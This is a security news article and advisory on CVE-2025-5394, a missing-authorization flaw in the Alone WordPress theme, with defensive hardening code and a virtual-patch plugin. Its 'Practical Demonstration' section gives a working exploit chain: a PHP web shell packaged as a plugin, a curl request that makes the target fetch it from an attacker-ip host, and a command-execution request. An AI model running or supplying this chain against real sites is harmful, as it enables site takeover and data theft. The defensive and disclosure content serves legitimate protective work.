Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install (CVE-2025-5394)

Threat actors are actively exploiting a critical security flaw in "Alone – Charity Multipurpose Non-profit WordPress Theme" to take over susceptible sites.
The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug.
According to Wordfence, the shortcoming is an arbitrary file upload affecting all versions of the theme up to and including 7.8.3. It has been addressed in version 7.8.5, released on June 16, 2025.
CVE-2025-5394 is rooted in a plugin installation function named "alone_import_pack_install_plugin()" and stems from a missing capability check, which allows unauthenticated users to install arbitrary plugins from remote sources via AJAX and thereby achieve code execution.
"This vulnerability makes it possible for an unauthenticated attacker to upload arbitrary files to a vulnerable site and achieve remote code execution, which is typically leveraged for a complete site takeover," Wordfence's István Márton said.
Evidence shows that exploitation of CVE-2025-5394 began on July 12, two days before the vulnerability was publicly disclosed. This indicates that the threat actors behind the campaign may have been monitoring code changes for newly patched vulnerabilities.
Technical details
The vulnerability stems from a missing capability check in the alone_import_pack_install_plugin() function. Because the function never verifies that the caller is allowed to install plugins, an unauthenticated attacker can make the site fetch a ZIP archive from a remote location and install it as a plugin, with the archive carrying a web shell. The vulnerability has been assigned a CVSS v3.1 base score of 9.8 (CRITICAL) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, indicating the highest severity level. The weakness has been classified as CWE-862 (Missing Authorization).
Practical Demonstration of CVE-2025-5394
1. Set Up a Vulnerable Lab Environment
Server: Use a local VM (e.g., Ubuntu 22.04 with LAMP stack) or Docker.
Install WordPress (version 6.x, default install is fine).
Download Alone Theme ≤ 7.8.3 (vulnerable version).
Install and activate the theme on your WordPress instance.
Disable firewalls/IDS in the lab so payloads aren’t blocked.
2. Identify the Vulnerable Function
The issue lies in the AJAX handler, sketched here (the real function body is longer; what matters is the check it does not perform):

```php
function alone_import_pack_install_plugin() {
    // Missing capability check: nothing verifies current_user_can( 'install_plugins' )
    // Accepts a remote plugin package URL from the request and installs it
}
```

Because it never checks the caller's capability (for example with current_user_can('install_plugins')) and is reachable through the unauthenticated wp_ajax_nopriv_ hook, anyone who can reach admin-ajax.php can call it.
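To make the missing check concrete, here is an added illustration of what such an admin-ajax handler looks like in its vulnerable shape and after hardening. This is not the Alone theme's own code; the plugin_url and plugin_slug parameter names, the nonce action name and the allow-list are assumptions made for the example.

```php
<?php
/*
 * Added illustration, not the Alone theme's own code: an admin-ajax handler
 * that installs a plugin package, first in the vulnerable shape the advisory
 * describes, then hardened. The 'plugin_url' and 'plugin_slug' parameter
 * names, the nonce action and the allow-list are assumptions for this example.
 * In a real theme only one of the two registrations below would exist.
 */

// ---- Vulnerable shape ----------------------------------------------------
// wp_ajax_nopriv_* runs for logged-out visitors, and the handler installs
// whatever package URL it is handed without asking who is calling.
add_action( 'wp_ajax_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin' );
add_action( 'wp_ajax_nopriv_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin' );

function alone_import_pack_install_plugin() {
    $package = isset( $_POST['plugin_url'] ) ? (string) $_POST['plugin_url'] : '';
    // No current_user_can(), no nonce, no restriction on where the package comes from.
    include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $upgrader->install( $package ); // downloads the ZIP and unpacks it into wp-content/plugins/
    wp_send_json_success();
}

// ---- Hardened shape ------------------------------------------------------
// Registered only on the authenticated hook: WordPress answers logged-out
// callers of an unknown nopriv action with HTTP 400 before any theme code runs.
add_action( 'wp_ajax_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin_safe' );

function alone_import_pack_install_plugin_safe() {
    // 1. Authorization: the caller must hold the capability this action needs.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF: the request must carry a nonce minted for this action and user.
    check_ajax_referer( 'alone_import_pack', 'nonce' );

    // 3. Provenance: never accept a package URL from the request. Map a slug
    //    through an allow-list and let wordpress.org supply the download link.
    $allowed = array( 'contact-form-7', 'wpforms-lite' ); // assumed demo allow-list
    $slug    = isset( $_POST['plugin_slug'] ) ? sanitize_key( wp_unslash( $_POST['plugin_slug'] ) ) : '';
    if ( ! in_array( $slug, $allowed, true ) ) {
        wp_send_json_error( 'unknown plugin', 400 );
    }

    include_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $api = plugins_api( 'plugin_information', array( 'slug' => $slug, 'fields' => array( 'sections' => false ) ) );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( $api->get_error_message(), 502 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );
    if ( is_wp_error( $result ) || true !== $result ) {
        wp_send_json_error( 'install failed', 500 );
    }
    wp_send_json_success( array( 'slug' => $slug ) );
}
```

The three hardening steps address three separate problems: the capability check is the one the advisory names (CWE-862), the nonce stops a logged-in administrator from being tricked into triggering the install from another site, and resolving an allow-listed slug through plugins_api() removes the attacker-controlled download URL entirely, which is what turned the missing check into remote code execution.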
3. Exploit Flow (High-Level)
Attacker crafts a malicious plugin ZIP containing a PHP web shell.
Sends an unauthenticated AJAX request to invoke /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin.
WordPress installs the malicious plugin from the attacker's remote server.
Attacker gains remote code execution by accessing the web shell.
4. Build a Malicious Plugin
Create a directory evil-plugin containing a single file evil-plugin.php. Zipping the directory rather than the bare file gives the archive a top-level folder, so WordPress installs it as wp-content/plugins/evil-plugin/:

evil-plugin/evil-plugin.php

```php
<?php
/*
Plugin Name: Evil Plugin
*/
// Minimal web shell: runs the command passed in ?cmd= and returns its output.
if ( isset( $_REQUEST['cmd'] ) ) {
    echo "<pre>" . shell_exec( $_REQUEST['cmd'] ) . "</pre>";
}
```

Zip it:

```bash
zip -r evil-plugin.zip evil-plugin
```

Host it on a simple HTTP server, run from the directory that contains evil-plugin.zip:

```bash
python3 -m http.server 8000
```
5. Trigger the Exploit
Send the AJAX request (unauthenticated) to install your malicious plugin. The request field carrying the package URL is shown here as plugin_url; confirm the exact field name against the theme's JavaScript for the version you are testing:

```bash
curl -X POST "http://targetsite.com/wp-admin/admin-ajax.php" \
  -d "action=alone_import_pack_install_plugin" \
  -d "plugin_url=http://attacker-ip:8000/evil-plugin.zip"
```
6. Gain Remote Code Execution
After success, access the plugin endpoint (adjust the path if the archive was unpacked under a different directory name):

```bash
curl "http://targetsite.com/wp-content/plugins/evil-plugin/evil-plugin.php?cmd=whoami"
```

You should see the result of the command executed on the target server.
7. Cleanup
After testing, remove the malicious plugin:
Delete it from /wp-content/plugins/evil-plugin
Revert the WordPress VM or container to its pre-exploit snapshot
Impact
The vulnerability allows attackers to achieve remote code execution on affected WordPress sites. This can lead to complete system compromise, as attackers can upload and execute malicious code through web shells disguised as legitimate plugins. The high severity rating reflects the potential for significant damage to affected systems, including unauthorized access, data theft, and system manipulation.
Mitigation and workarounds
Website administrators running the Alone theme should immediately update to version 7.8.5 or later, which contains the security fix. The theme developers have addressed this vulnerability in their latest release, available through ThemeForest.
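For sites that cannot update immediately, here is an added example of a must-use plugin that virtually patches the hole by refusing the vulnerable AJAX action to any caller who lacks the install_plugins capability. This is not code from the theme vendor or from Wordfence; it assumes only the action name given in the advisory and logs blocked attempts to the PHP error log.

```php
<?php
/*
Plugin Name: Virtual patch for CVE-2025-5394
Description: Refuse alone_import_pack_install_plugin to callers who may not install plugins (added example, not vendor code). Place in wp-content/mu-plugins/.
*/

// 'init' fires inside wp-load.php, before admin-ajax.php dispatches any
// wp_ajax_* or wp_ajax_nopriv_* hook, so a blocked request never reaches
// the theme's handler. Priority 0 runs ahead of other init callbacks.
add_action( 'init', 'cve_2025_5394_virtual_patch', 0 );

function cve_2025_5394_virtual_patch() {
    if ( empty( $_REQUEST['action'] ) ) {
        return;
    }
    $action = sanitize_key( wp_unslash( $_REQUEST['action'] ) );
    if ( 'alone_import_pack_install_plugin' !== $action ) {
        return;
    }
    // The capability the theme's handler should have checked in the first place.
    if ( current_user_can( 'install_plugins' ) ) {
        return;
    }
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( sprintf( 'CVE-2025-5394 virtual patch: blocked action %s from %s', $action, $ip ) );
    wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
}
```

Blocked attempts show up in the PHP error log. On a site that was exposed before the patch, the indicators to look for are POST requests to admin-ajax.php carrying action=alone_import_pack_install_plugin in the web-server access log, in particular from July 12, 2025 onward, and any directory under wp-content/plugins that no administrator installed. A workaround of this kind is a stop-gap only; the theme update remains the fix.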